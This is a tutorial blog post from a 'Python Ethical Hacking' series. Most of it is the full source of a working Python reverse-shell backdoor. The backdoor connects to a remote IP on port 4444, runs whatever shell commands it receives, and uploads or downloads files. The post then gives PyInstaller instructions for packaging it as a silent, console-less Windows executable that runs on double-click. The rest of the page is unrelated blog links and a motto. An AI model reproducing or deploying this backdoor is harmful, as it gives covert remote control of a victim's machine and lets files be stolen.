• Python Ethical Hacking


    PACKAGING

    • Convert python program into an executable that:
      • Packages all program files into a single executable.
      • Works without a python interpreter.
      • Get executed when double-clicked.
    • For best results package the program from the same OS as the target.
      • EG if the target is Windows then package the program from a Windows computer with a python interpreter.

    Install PyInstaller firstly.

    Refer to : https://pyinstaller.readthedocs.io/en/latest/installation.html

    Polish the backdoor code to fit the silent executable.

    #!/usr/bin/env python
    import json
    import socket
    import subprocess
    import os
    import base64
    import sys
    
    
    class Backdoor:
        def __init__(self, ip, port):
            self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            self.connection.connect((ip, port))
    
        def reliable_send(self, data):
            json_data = json.dumps(data).encode()
            self.connection.send(json_data)
    
        def reliable_receive(self):
            json_data = ""
            while True:
                try:
                    json_data = json_data + self.connection.recv(1024).decode()
                    return json.loads(json_data)
                except ValueError:
                    continue
    
        def change_working_directory_to(self, path):
            os.chdir(path)
            return "[+] Changing working directory to " + path
    
        def execute_system_command(self, command):
            DEVNULL = open(os.devnull, "wb")
            return subprocess.check_output(command, shell=True, stderr=DEVNULL, stdin=DEVNULL)
    
        def read_file(self, path):
            with open(path, "rb") as file:
                return base64.b64encode(file.read())
    
        def write_file(self, path, content):
            with open(path, "wb") as file:
                file.write(base64.b64decode(content))
                return "[+] Upload successful."
    
        def run(self):
            while True:
                command = self.reliable_receive()
    
                try:
                    if command[0] == "exit":
                        self.connection.close()
                        sys.exit()
                    elif command[0] == "cd" and len(command) > 1:
                        command_result = self.change_working_directory_to(command[1])
                    elif command[0] == "upload":
                        command_result = self.write_file(command[1], command[2])
                    elif command[0] == "download":
                        command_result = self.read_file(command[1]).decode()
                    else:
                        command_result = self.execute_system_command(command).decode()
                except Exception:
                    command_result = "[-] Error during command execution."
    
                self.reliable_send(command_result)
    
    
    my_backdoor = Backdoor("10.0.0.43", 4444)
    my_backdoor.run()

    Convert the python program to an executable program.

    C:Python37Scriptspyinstaller.exe reverse_backdoor.py --onefile --noconsole

     Find and double-click the reverse-backdoor.exe program in the dist folder.

    The executable program runs perfectly.

    相信未来 - 该面对的绝不逃避,该执著的永不怨悔,该舍弃的不再留念,该珍惜的好好把握。
  • 相关阅读:
    循环结构进阶
    数组
    循环结构(二)
    循环结构(一)
    选择结构(二)
    选择结构(一)
    Ext tabpanel集成第三方charts(echarts、amcharts等)的问题(报getstyle为null的错误)
    JAVA调用.NET WebService终极方案(包含对SoapHeader的处理)
    【翻译】Organizing ASP.NET MVC solutions 如何组织你的ASP.NET MVC解决方案
    03、Kibana WEB安装配置
  • 原文地址:https://www.cnblogs.com/keepmoving1113/p/11632304.html
Copyright © 2020-2023  润新知